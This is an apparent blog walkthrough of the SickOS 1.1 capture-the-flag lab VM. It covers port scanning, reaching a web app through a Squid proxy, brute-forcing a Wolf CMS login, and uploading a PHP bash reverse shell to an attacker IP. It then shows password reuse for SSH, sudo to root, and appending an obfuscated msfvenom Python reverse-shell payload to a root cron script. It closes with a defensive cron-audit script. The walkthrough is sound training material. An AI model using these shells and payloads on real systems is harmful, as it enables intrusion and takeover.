Target practice notes: SickOS 1.1

Posted by sunset2131 on 2024-09-22

https://www.vulnhub.com/entry/sickos-11,132/

Host discovery and port scanning

  1. Discover live hosts. .136 is the target, since it is the machine I added last

    nmap -sP 192.168.75.0/24
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:36 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00038s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00031s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.136
    Host is up (0.00049s latency).
    MAC Address: 00:0C:29:62:FB:04 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00027s latency).
    MAC Address: 00:50:56:F8:B3:1A (VMware)
    Nmap scan report for 192.168.75.131
    Host is up.
    
  2. Scan all open ports on the target

    nmap -sT -min-rate 10000 -p- 192.168.75.136 
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:41 CST
    Nmap scan report for 192.168.75.136
    Host is up (0.00075s latency).
    Not shown: 65532 filtered tcp ports (no-response)
    PORT     STATE  SERVICE
    22/tcp   open   ssh
    3128/tcp open   squid-http
    8080/tcp closed http-proxy
    MAC Address: 00:0C:29:62:FB:04 (VMware)
    
  3. Identify service versions and the OS version

  4. Scan for vulnerabilities with NSE scripts

    nmap -script=vuln -p 22,3128,8080 192.168.75.136 -oA Desktop/test/vuln
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:46 CST
    Nmap scan report for 192.168.75.136
    Host is up (0.00085s latency).
    
    PORT     STATE  SERVICE
    22/tcp   open   ssh
    3128/tcp open   squid-http
    8080/tcp closed http-proxy
    MAC Address: 00:0C:29:62:FB:04 (VMware)
    

Web penetration

  • Only 8080 is closed; the open ports are 3128, running a Squid proxy service, and SSH. Visiting port 3128 returns

    ERROR
    The requested URL could not be retrieved
    The following error was encountered while trying to retrieve the URL: /
        Invalid URL
    Some aspect of the requested URL is incorrect.
    Some possible problems are:
        Missing or incorrect access protocol (should be "http://" or similar)
        Missing hostname
        Illegal double-escape in the URL-Path
        Illegal character in hostname; underscores are not allowed.
    Your cache administrator is webmaster.
    Generated Sun, 22 Sep 2024 06:03:35 GMT by localhost (squid/3.1.19)
    

    The version is therefore 3.1.19. Since it is a proxy server, it is probably proxying something, most likely port 80

  • Because my Firefox is connected to Burp's proxy address, to reach other sites through this proxy while still capturing the traffic, an upstream proxy server must be configured in Burp

    Roughly under: Network -> Connections -> Upstream proxy servers, add the proxy address 192.168.75.136:3128

  • Visiting 192.168.75.136 now returns a page, which means port 80 is being proxied through 192.168.75.136:3128

    # content
    BLEHHH!!! 
    

    It is just internet slang

  • Scan directories; the proxy server must be specified

    python .\dirsearch.py -u http://192.168.75.136 --proxy 192.168.75.136:3128
    //
    [12:15:18] 403 -  243B  - /cgi-bin/
    [12:15:19] 200 -  109B  - /connect
    [12:15:20] 403 -  239B  - /doc/
    [12:15:20] 403 -  242B  - /doc/api/
    [12:15:20] 403 -  247B  - /doc/html/index.html
    [12:15:20] 403 -  249B  - /doc/en/changes.html
    [12:15:20] 403 -  247B  - /doc/stable.version
    [12:15:29] 200 -   58B  - /robots.txt
    [12:15:30] 403 -  242B  - /server-status
    [12:15:30] 403 -  242B  - /server-status/
    

    Found robots.txt and connect

    1. Contents of connect

      #!/usr/bin/python
      
      print "I Try to connect things very frequently\n"
      print "You may want to try my services"
      
    2. Contents of robots.txt

      User-agent: *
      Disallow: /
      Dissalow: /wolfcms
      

      This hints at wolfcms

  • Visiting /wolfcms shows a content management system; brute-force its directories

    python .\dirsearch.py -u http://192.168.75.136/wolfcms --proxy 192.168.75.136:3128
    //
    [12:18:17] 200 -  403B  - /wolfcms/composer.json
    ....
    [12:18:17] 200 -    4KB - /wolfcms/CONTRIBUTING.md
    [12:18:18] 301 -  253B  - /wolfcms/docs  ->  http://192.168.75.136/wolfcms/docs/
    [12:18:18] 200 -  512B  - /wolfcms/docs/
    [12:18:18] 200 -    2KB - /wolfcms/docs/updating.txt
    [12:18:19] 200 -  894B  - /wolfcms/favicon.ico
    [12:18:26] 301 -  257B  - /wolfcms/public  ->  http://192.168.75.136/wolfcms/public/
    [12:18:26] 200 -  462B  - /wolfcms/public/
    [12:18:26] 200 -    2KB - /wolfcms/README.md
    [12:18:27] 200 -   20B  - /wolfcms/robots.txt
    

    Found robots.txt and README.md

    On visiting them, robots.txt is empty and README.md is a configuration guide

  • Looking it up shows that the admin login page is at /wolfcms/?/admin/login

    Searched online for the default credentials and tried them; login failed

    Brute-forced with Burp, fixing the username as admin and iterating over a password wordlist

    The brute-force succeeded; both the username and the password are admin

Getting an initial shell

  • After logging in, look for exploitable features; found the file upload

  • Upload a file containing reverse-shell code

    //getshell.php
    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.75.131/1234 0>&1'");?>
    
  • After uploading, clicking the file shows that it is stored at /public/getshell.php

  • Trying step by step, the file turns out to be at http://192.168.75.136/wolfcms/public/getshell.php

    Start a listener on Kali

    nc -lvp 1234                                                     
    listening on [any] 1234 ...
    

    Visit http://192.168.75.136/wolfcms/public/getshell.php

    The reverse shell connects

  • Check its privileges

    listening on [any] 1234 ...
    192.168.75.136: inverse host lookup failed: Unknown host
    connect to [192.168.75.131] from (UNKNOWN) [192.168.75.136] 52339
    //
    www-data@SickOs:/var/www/wolfcms/public$ dpkg -l
    ...
    //
    www-data@SickOs:/var/www/wolfcms/public$ sudo -l
    sudo: no tty present and no askpass program specified
    Sorry, try again.
    sudo: no tty present and no askpass program specified
    Sorry, try again.
    sudo: no tty present and no askpass program specified
    Sorry, try again.
    sudo: 3 incorrect password attempts
    //
    www-data@SickOs:/var/www/wolfcms/public$ uname -a
    Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
    

    Privileges are low; the hostname is SickOs and the kernel version is 3.11.0-15

Privilege escalation

  • Since Wolf is a CMS, there must be a file holding the database connection settings; found config.php

    cat /var/www/wolfcms/config.php
    //
    <?php 
    
    // Database information:
    // for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
    // The path can only be absolute path or :memory:
    // For more info look at: www.php.net/pdo
    
    // Database settings:
    define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
    define('DB_USER', 'root');
    define('DB_PASS', 'john@123');
    define('TABLE_PREFIX', '');
    .....
    

    The database username is root and the password is john@123

    This password may also be the password of some user on the system

  • Check /etc/passwd for candidate users

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    messagebus:x:102:105::/var/run/dbus:/bin/false
    whoopsie:x:103:106::/nonexistent:/bin/false
    landscape:x:104:109::/var/lib/landscape:/bin/false
    sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
    sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
    mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
    

    Candidate users: root, www-data, backup, sickos

  • Try SSH logins as the candidate users with john@123, the password from the database connection settings

    In the end, sickos logs in successfully

  • Check the sickos user's privileges

    sickos@SickOs:~$ sudo -l
    //
    [sudo] password for sickos: 
    Matching Defaults entries for sickos on this host:
        env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
    User sickos may run the following commands on this host:
        (ALL : ALL) ALL
    

    Equivalent to root privileges

  • Read the flag

    sickos@SickOs:~$ sudo /bin/bash
    root@SickOs:~# 
    //
    root@SickOs:/home# cd /root
    root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt 
    If you are viewing this!!
    
    ROOT!
    
    You have Succesfully completed SickOS1.1.
    Thanks for Trying
    

Another privilege escalation approach

  1. Check the scheduled tasks (crontab); /etc/cron.d/ contains a file named automate

    Its contents:

    www-data@SickOs:/etc/cron.d$ cat automate
    //
    * * * * * root /usr/bin/python /var/www/connect.py
    

    Runs connect.py as root every minute

  2. Reverse-shell code can be appended to connect.py

  3. Generate a Python payload

    msfvenom -p cmd/unix/reverse_python lhost=192.168.75.131 lport=1235 -f raw
    //
    [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    [-] No arch selected, selecting arch: cmd from the payload
    No encoder specified, outputting raw payload
    Payload size: 364 bytes
    python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkM0KwjAQhF8l5JSARJNSf5AcilQQUcH2XmyMtFib0E3fX0Paeuxehtn9dge2/ljTOQRGvbVDCC0Qgr60nVEaIHjz0z3yVRlwEvOdYHy9ZZuY8YjjcejvSC6ieGyADFdZEDK45Ficrmk+ZIVedjuciyy/p8mFTutMmbbVyhHicwPvQ+iEGGDP3goC7FU3ujWEBmo1S/BZQkyElf+PMPVoGoKXZd0uocL0C7l5Vrk=')[0])))
    

    Because the cron job already runs a Python file, there is no need to wrap it in another python -c, so what is needed is just

    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkM0KwjAQhF8l5JSARJNSf5AcilQQUcH2XmyMtFib0E3fX0Paeuxehtn9dge2/ljTOQRGvbVDCC0Qgr60nVEaIHjz0z3yVRlwEvOdYHy9ZZuY8YjjcejvSC6ieGyADFdZEDK45Ficrmk+ZIVedjuciyy/p8mFTutMmbbVyhHicwPvQ+iEGGDP3goC7FU3ujWEBmo1S/BZQkyElf+PMPVoGoKXZd0uocL0C7l5Vrk=')[0])))
    
  4. Redirect the payload into connect.py (connect.py is in fact the file found as /connect during the web penetration phase)

    echo "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkM0KwjAQhF8l5JSARJNSf5AcilQQUcH2XmyMtFib0E3fX0Paeuxehtn9dge2/ljTOQRGvbVDCC0Qgr60nVEaIHjz0z3yVRlwEvOdYHy9ZZuY8YjjcejvSC6ieGyADFdZEDK45Ficrmk+ZIVedjuciyy/p8mFTutMmbbVyhHicwPvQ+iEGGDP3goC7FU3ujWEBmo1S/BZQkyElf+PMPVoGoKXZd0uocL0C7l5Vrk=')[0])))" >> /var/www/connect.py
    
  5. Start a listener on Kali and wait for the code to run

    Root privileges obtained

    nc -lvp 1235                                    
    listening on [any] 1235 ...
    //
    192.168.75.136: inverse host lookup failed: Unknown host
    connect to [192.168.75.131] from (UNKNOWN) [192.168.75.136] 51066
    
    python -c "import pty;pty.spawn('/bin/bash')"
    root@SickOs:~#
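
As an added example that is not part of the original write-up: a defender-side audit in Python for the cron exposure above. It parses /etc/cron.d entries in system-crontab syntax, picks out the jobs that run as root, and flags any file they execute that a non-root user could modify, which is exactly the /var/www/connect.py case here. The cron text and the file modes in the sample are constructed.

```python
import os
import re
import stat
from collections import namedtuple

# Constructed sample: the automate entry from the write-up, plus a comment and an env line to skip.
SAMPLE_CRON_D = """\
# m h dom mon dow user command
SHELL=/bin/sh
* * * * * root /usr/bin/python /var/www/connect.py
@hourly root /usr/local/bin/cleanup.sh
"""
SPECIALS = ("@reboot", "@yearly", "@annually", "@monthly", "@weekly", "@daily", "@hourly")
CronEntry = namedtuple("CronEntry", "schedule user command")

def parse_cron_d(text):
    """System-crontab syntax: five time fields (or one @special), then user, then command."""
    entries = []
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split()
        if fields[0] in SPECIALS and len(fields) >= 3:
            entries.append(CronEntry(fields[0], fields[1], " ".join(fields[2:])))
        elif len(fields) >= 7:
            entries.append(CronEntry(" ".join(fields[:5]), fields[5], " ".join(fields[6:])))
    return entries

def script_paths(command):
    """Absolute paths in the command: the interpreter and the script handed to it."""
    return [tok for tok in command.split() if tok.startswith("/")]

def writable_by_non_root(st_mode, st_uid):
    """A non-root owner or group/other write bits let a non-root user change the file."""
    return st_uid != 0 or bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(entries, stat_fn=os.stat):
    """Findings for root jobs whose executed files a non-root user could modify."""
    findings = []
    for e in entries:
        if e.user != "root":
            continue
        for path in script_paths(e.command):
            try:
                st = stat_fn(path)
            except OSError:
                continue  # path absent on this host; nothing to check
            if writable_by_non_root(st.st_mode, st.st_uid):
                findings.append(f"{e.schedule} root runs {path} (mode {stat.filemode(st.st_mode)}, uid {st.st_uid})")
    return findings
```

On a real host, run audit(parse_cron_d(open(path).read())) over each file under /etc/cron.d; every finding is a root job whose code a lower-privileged account can rewrite.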